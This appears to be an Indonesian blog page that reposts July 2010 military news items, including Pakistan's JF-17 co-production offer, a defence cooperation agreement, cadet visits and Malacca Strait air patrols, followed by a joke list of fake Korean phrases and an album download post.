Pakistan Tawarkan RI Produksi Pesawat Tempur JF-17

JAKARTA - Pakistan menawarkan Indonesia untuk memproduksi pesawat tempur bersama. Jenis yang ditawarkan adalah JF-17, yang diklaim setingkat di atas jet tempur canggih produk Amerika Serikat, F-16.

Hal tersebut diungkapkan Menteri Pertahanan Purnomo Yusgiantoro, usai penandatanganan MoU kerja sama bidang pertahanan dengan Menteri Pertahanan Pakistan Chaudry Ahmad Muchtar, di kantor Kementerian Pertahanan, Jakarta, Rabu (21/7).

"Kita ingin melihat lebih jauh tawaran tersebut untuk ditindaklanjuti. Karena kita juga ditawari kerja sama yang sama oleh Korea Selatan," kata Purnomo. Menurut dia, saat ini Pakistan tengah bekerja sama dengan China membangun pesawat tempur.

PRIMAAIRONLINE

RI – Pakistan Sepakati Perjanjian Kerjasama Pertahanan


21 Juli 2010, Jakarta -- Menteri Federal Urusan Pertahanan Pakistan, Chaudry Ahmad Mukhtar, Rabu (21/7), melakukan kunjungan kenegaraan kepada Menteri Pertahanan RI Purnomo Yusgiantoro, di Kantor Kemhan, Jakarta.. Kunjungannya kali ini adalah untuk melakukan penandatanganan Perjanjian Kerjasama Pertahanan (Defence Cooperation Agreement) antara RI dan Pakistan.

Adapun salah satu isi dari perjanjian kerjasama pertahanan yang akan ditandatangani adalah kesepakatan mengenai akan diadakannya dialog dan konsultasi bilateral secara regular antara kedua negara dalam bidang strategis dan isu-isu keamanan yang menjadi perhatian bersama.

Hal lainnya yang termasuk dalam perjanjian kerjasama pertahanan tersebut adalah, pertukaran informasi dalam hal pertahanan termasuk di dalamnya mengenai organisasi, doktrin dan kebijakan pertahanan. Kerjasama di bidang ilmu pengetahuan dan teknologi pertahanan melalui pertukaran personel, saling kunjung, latihan bersama, dan saling tukar informasi serta bentuk-bentuk kerjasama teknis lainnya yang berdasarkan prinsip kesetaraan dan kepentingan bersama.

Perjanjian pertahanan tersebut juga memuat mengenai upaya untuk mendorong pengembangan SDM institusi pertahanan dan angkatan bersenjata kedua belah pihak melalui pendidikan, pelatihan, saling kunjung, latihan bersama, pertukaran pengamat militer dalam mengawasi latihan dan pertukaran pendidikan keahlian, peralatan dan aktifitas yang berhubungan dengan hal-hal tersebut. Serta kerjasama di bidang pertahanan lainnya yang telah disetujui oleh kedua pihak.

Dalam kunjungannya ke Indonesia ini, Menhan Pakistan beserta rombongan juga dijadwalkan mengunjungi Museum Purna Bhakti di Taman Mini Indonesia Indah. Menteri Federal Urusan Pertahanan Pakistan Chaudhry Ahmad Mukhtar yang lahir di Lahore pada tahun 1946 ini menjadi Menteri Pertahanan sejak tahun 2008. Sebelum mengawali karier politik di tahun 1990 dan menjadikannya Menteri Pertahanan Pakistan saat ini, ia adalah seorang pengusaha. Sebelumnya dia pernah menjabat sebagai Menteri Perdagangan pada masa pemerintahan Benazir Bhutto.

DMC

813 Taruna Akademi TNI Dan Polri Kunjungi Bumi Marinir Cilandak

813 Taruna Akademi TNI dan Polri mengunjungi Bumi Marinir Cilandak

Sebanyak 813 Taruna Akademi TNI dan Polri mengunjungi Bumi Marinir Cilandak, Jakarta, Senin (19/7). Mereka kemudian melihat berbagai demonstrasi dari para prajurit Marinir. Tampak Para taruna menyaksikan demontrasi serbuan kilat oleh satuan anti teror Korps Marinir.

Komandan Korps Marinir Mayjen TNI (Mar) M. Alfan Baharudin menerima kunjungan Taruna Akademi TNI dan Polri di Bhumi Marinir Cilandak, Jakarta Selatan, Senin (19/7).

Kunjungan 813 taruna Akademi TNI dan Polri yang dipimpin Komandan Jenderal Akademi TNI Mayjen TNI (Mar) Nono Sampono terdiri dari 249 Taruna Akademi Militer, 107 Taruna Akademi Angkatan Laut, 110 taruna Akademi Angkatan Udara dan 327 Taruna Akademi Kepolisian yang terdiri dari 287 Taruna dan 40 Taruni tersebut dalam rangka latihan Bhinneka Eka Bhakti (BEB) Taruna Akademi TNI dan Polri tingkat I tahun pelajaran 2009/2010.

Dalam sambutannya Dankormar menjelaskan tentang organisasi, Kesatuan-kesatuan, serta kiprah Korps Marinir dalam penugasan operasi tempur maupun operasi keamanan dalam negeri dan tugas internasional dibawah bendera PBB serta tugas pengamanan pulau terluar wilayah NKRI.

Sementara itu, Komandan Jenderal Akademi TNI mengatakan, kegiatan ini bertujuan memberikan bekal kepada para taruna/taruni agar mengetahui peranan dan tugas satuan-satuan dijajaran TNI/Polri secara langsung sehingga mendapat wawasan tentang kematraan.

Usia menerima pengarahan dan tukar menukar cindermata, para taruna/taruni menyaksikan demontrasi serbuan kilat oleh satuan anti teror Korps Marinir, kolone senapan, serbuan amphibi dan melihat dari dekat gelar material baik senjata perorangan, senjata bantuan maupun kendaraan tempur yang dimiliki Korps Marinir.

Selanjutnya para taruna akademi TNI dan Polri berkesempatan foto bersama dengan Danjen Akademi TNI, Dankormar beserta jajarannya serta para pengasuh Taruna/taruni di monumen Yasa Wira Perkasa.

Rangkaian kegiatan kunjungan diakhiri dengan jamuan makan bersama dan hiburan di Balai Prajurit Pangkalan Marinir Jakarta.

Dispen Korps Marinir

Gubernur Akmil : Kesejagatan Menuntut Prajurit Unggul

Gubernur Akademi Militer Mayjen TNI Gatot Nurmantyo (kiri) menyerahkan penghargaan kepada siswa terbaik pada upacara penutupan pendidikan siswa Dikmapa prajurit karier TNI tahun ajaran 2010 di lapangan Sapta Marga, lembah Tidar komplek Akmil Magelang, Jateng, Sabtu (17/7). Dalam amanatnya di hadapan 209 siswa Dikmapa PK, gubernur Akmil menegaskan perkembangan lingkungan strategis di era kesejagatan (globalisasi) yang ditandai dengan kemajuan secara pesat ilmu pengetahuan dan teknologi, khususnya teknologi komunikasi dan informasi menuntut sumber daya manusia yang memiliki keunggulan komparatif dan kompetitif. (Foto: ANTARA/Anis Efizudin/ss/nz/10)

17 Juli 2010, Magelang -- Gubernur Akademi Militer, Mayor Jenderal TNI Gatot Nurmantyo, mengatakan, perkembangan lingkungan strategis pada era kesejagatan menuntut prajurit TNI yang memiliki keunggulan komparatif dan kompetitif.

"Karena dengan keunggulan itu TNI dapat merebut peluang dan menekan kendala sehingga mampu melahirkan karya terbaik dan prestasi tertinggi untuk kepentingan TNI, bangsa, dan negara," katanya ketika memimpin Upacara Penutupan Pendidikan Pertama Perwira Prajurit Karier TNI Tahun Ajaran 2010 di Lapangan Sapta Marga, kompleks Akmil, lembah Gunung Tidar, Kota Magelang, Jawa Tengah, Sabtu.

Ia menjelaskan, perkembangan lingkungan strategis di era kesejagatan (globalisasi) itu ditandai dengan kemajuan secara pesat ilmu pengetahuan dan teknologi, khususnya teknologi komunikasi dan informasi.

Perkembangan itu, katanya, menuntut sumber daya manusia yang memiliki keunggulan komparatif dan kompetitif.

Sumber daya manusia TNI yang unggul, katanya, memerlukan sosok prajurit dengan militansi tinggi yaitu keunggulan moral, rela berkorban, tidak mengenal menyerah, dan senantiasa manunggal bersama rakyat.

Selain itu, katanya, perlu prajurit yang senantiasa menempatkan kepentingan tugas di atas segala-galanya karena tugas adalah kehormatan, harga diri, dan kebanggaan.

"Itu harus dilakukan dengan penuh ikhlas, tulus, dan pengorbanan secara total," kata Gatot yang juga Komandan Dikmapa PK TNI itu.

Sebanyak 209 siswa Dikmapa PK menjalani penutupan pendidikan setelah mereka selama tujuh bulan dididik dan dilatih olah keprajuritan di kompleks Akmil Kota Magelang (siswa pria) sebanyak 179 orang dan Pusat Pendidikan Korps Wanita Angkatan Darat (Kowad) Lembang, Bandung, Jawa Barat sebanyak 30 orang.

Mereka yang sebelumnya sebagai warga sipil dan telah lulus perguruan tinggi berasal dari berbagai jurusan itu, setelah menjalani Dikmapa PK TNI, selanjutnya sebagai perwira TNI dengan pangkat letnan dua.

Menurut rencana, pelantikan mereka sebagai perwira TNI berpangkat letnan dua melalui Upacara Prasetia Perwira oleh Panglima TNI, Jenderal TNI Djoko Santoso, pada 20 Juli 2010 di Akmil.

Lulusan pria terbaik Dikmapa PK TNI Tahun Ajaran 2010 sehingga meraih penghargaan "Trisura Jalu Wiratama" adalah Sibin Chandra (matra darat), Z. Chandra S. Harahap (matra laut), Oky Freeza P.G. Daulay (matra udara).

Lulusan wanita terbaik sehingga meraih penghargaan "Trisura Wanodya Wiratama" adalah Yuharti (matra darat), Yosina Kahibela (matra laut), Nadia Yuanita (matra udara).

"Setelah menjadi perwira kelak, kalian harus terus berupaya mengembangkan kemampuan baik aspek intelektualitas maupun profesionalitas keprajuritan dengan menjadikan belajar dan berlatih sebagai budaya dan kebiasaan hidup kalian, sehingga mampu menjawab tuntutan berbagai penugasan nantinya," katanya.

ANTARA Jateng

TNI-AU Bersama Tiga AU ASEAN Laksanakan Operasi “Eyes in the Sky” di Selat Malaka dan Singapura

CN235 MPATanjungpinang - Tentara Nasional Indonesia Angkatan Udara bersama dengan Angkatan Udara Malaysia, Singapura, dan Thailand melakukan operasi “Eyes in the Sky” di Selat Malaka dan Singapura.

Kapten Pilot pesawat cassa TNI AU, Kapten Pnb Muhammad Arif di Tanjungpinang, Kepulauan Riau, Minggu, mengatakan operasi pengamanan wilayah udara dan laut di jalur perdagangan tersibuk di dunia itu merupakan patroli regional dalam rangka mempererat hubungan negara tetangga dalam hal pertahanan dan keamanan.

“Di bawah program EiS ini negara peserta akan melaksanakan pesawat patroli maritim (maritime patrol aircraft/MPA) untuk melaksanakan patroli di Selat Malaka dan Singapura sebagai bagian dari usaha untuk mempertinggi keamanan di jalur perairan dan selat itu sendiri,” ujarnya.

Menurut dia, operasi “Eyes in the Sky” (EiS) sejak 2005 tersebut dilaksanakan dari 16 sampai 18 Juli 2010.

Operasi tersebut menurut dia, tidak berprasangka kepada posisi dari seluruh negara yang terkait ke semua area yang sedang dipersengketakan atau yang belum ada batasnya.

“Area dari operasi ini akan mencakup internasional dan nasional wilayah udara di atas perairan dari Selat Malaka dan Singapura,” katanya menegaskan.

Pejabat Sementara (Pjs.) Kepala Seksi Penerangan dan Perpustakaan Pangkalan TNI AU Tanjungpinang, Lettu Lek Wardoyo, mengatakan EiS merupakan sistem pengaturan terbuka dengan persetujuan dari tiga negara daerah pesisir, yaitu Malaysia, Indonesia, dan Singapura.

“Beberapa negara lain dapat diundang untuk berpartisipasi dengan dasar sukarela dengan persetujuan dan izin dari ketiga negara tersebut,” ujar Wardoyo.

Menurut dia, negara peserta akan menyediakan berturut-turut aset udara untuk melaksanakan operasi yang harus dilengkapi dengan benar.

“Pusat operasi EiS bertanggung jawab kepada jadwal dari penerbangan atau `observer` dan menyebarkan informasi ini ke masing-masing negara yang bersangkutan,” katanya menambahkan.

Antara

Yonif 411/6/2/ Kostrad Tiba Dari Penugasan di Maluku

Yonif 411/6/2/ Kostrad Tiba Dari Penugasan di Maluku

Yonif 411/6/2/ Kostrad Tiba Dari Penugasan di Maluku

Yonif 411/6/2/ Kostrad Tiba Dari Penugasan di Maluku

Yonif 411/6/2/ Kostrad Tiba Dari Penugasan di Maluku

SEMARANG - Sejumlah prajurit TNI dari Yonif 411/6/2/Kostrad yang baru tiba dari penugasan di Maluku, berbaris pada upacara kedatangan pasukan yang dipimpin Panglima Divisi 2 Kostrad, Mayjen TNI Gerhan Lantara, di Pelabuhan Tanjung Emas, di Semarang, Jateng, Jumat (16/7). Sebanyak 487 prajurit TNI dari Yonif 411/6/2/Kostrad kembali ke kesatuannya setelah bertugas selama 11 bulan di daerah rawan Maluku dan Maluku Utara dengan menumpang kapal KRI Teluk Ratai. FOTO ANTARA/R. Rekotomo/ss/hp/10.

ARDAVA

Belajar Bahasa Korea ^-^

Mo blajar Bahasa Korea ???
Ni list nya...


Apa Kabar? = Anyong Aseo
Sampai Jumpa = Anyong
Kurang Ajar = Monyong
Tidak Lurus = Men Chong
Pria suka berdandan = Ben Chong
Tiba-tiba = She Khonyong Khonyong
Gak Punya Duit = Nao Dhong
Pengangguran = Nong Krong
Belanja = Bao Rhong
Merampok = Cho Long
Saringan Botol = Choo Rhong
Kendaraan Berkuda = An Dhong
Jual Mahal = Gheng Xi Dhong
Ngelamun = Bae Ngong
Mulut = Mon Chong
Sosis = Lap Chong
Suami dari adiknya Papa = Ku Chong
Kiss me = Soon Dhong Yang
Sweet memory = Choo Pang Dhong
Mobil mogok = Dho Rong Dhong
Lapangan luas = Park King Lot
Pantat gatal-gatal = Che Bhok Dhong
Nasi dibungkus daun pisang: Lon Thong
Cowok Cakep Kaca Mata: Bae Yong Jun
Cowok Cakep Rambut Lurus: Jang Dong Gun
Cowok Cakep Rambut Keriting: Ahn Jung Hwan
Bagian belakang = Bho Khong
Masih muda = brondhong
Pantat gatal = Ga ruk dong
Telur asin = Ndok A Chin
Sendok Gede = Cen Thong
Celana Sobek = Bho Long
Kepala Botak = Kin Clong
Lagi Menyanyi = Me Lo Lhong
Orang Hitam = Goo Shong
Bibir Ucup = Mo Nyong
Berbulu = Ge Ran Dhong
Jongkok Di Pinggir Kali = Be ol Dong

segitu dulu dah...

Within Temptation - Mother Earth

Within Temptation - Mother Earth
Country: The Netherlands
Genre: Gothic/Symphonic Metal
--- Support The Artist ---
-----Buy Original CDs-----
Full Album

File Size : 97.53 MB

Download Via Indowebster

----------------------

Support Palestine